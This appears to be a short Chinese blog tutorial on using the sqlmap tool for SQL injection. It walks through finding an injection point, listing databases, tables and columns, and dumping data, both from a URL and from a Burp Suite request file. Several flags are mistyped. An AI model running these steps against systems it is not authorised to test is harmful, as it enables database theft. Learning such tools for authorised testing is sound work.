sqlmap的使用方法

使用sqlmap爆破的基本方法:

首先sqlmap是渗透中的一个sql注入攻击工具

1.直接对url进行测试处理

  • 用sqlmap.py -u “url” 寻找注入点
  • 如果存在注入点,那么爆破数据库,寻找最近使用的数据库

​ sqlmap.py -u “url” –current-dbs

  • 如果存在有数据库名,再来爆破这个数据库里面的表

​ sqlmap.py -u “url” –D “数据库名” –tables

  • 如果数据库中有很多表的话,寻找自己需要的爆破的表名,在爆破表中的字段名

​ sqlmap.py -u “url” –D “数据库名” –T “表名” –columns

  • 如果爆破表中的字段名,在用可能是的字段名,在爆破字段中的数据

    ​ sqlmap.py -u “url” –D “数据库名” –T “表名” –C “字段名1,字段名2” --dump

2.可以利用Burpsuit抓取数据包进行处理、

  • 使用sqlmap.py -r 1.txt –current-dbs 爆最近使用的数据库
  • 使用sqlmap.py -r “d:/1.txt” -D webcalender -tables

​ 如果爆不出来建议加上数据库类型,sqlmap.py -r “d:/1.txt” --dbms=mysql -D webcalendar –tables

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值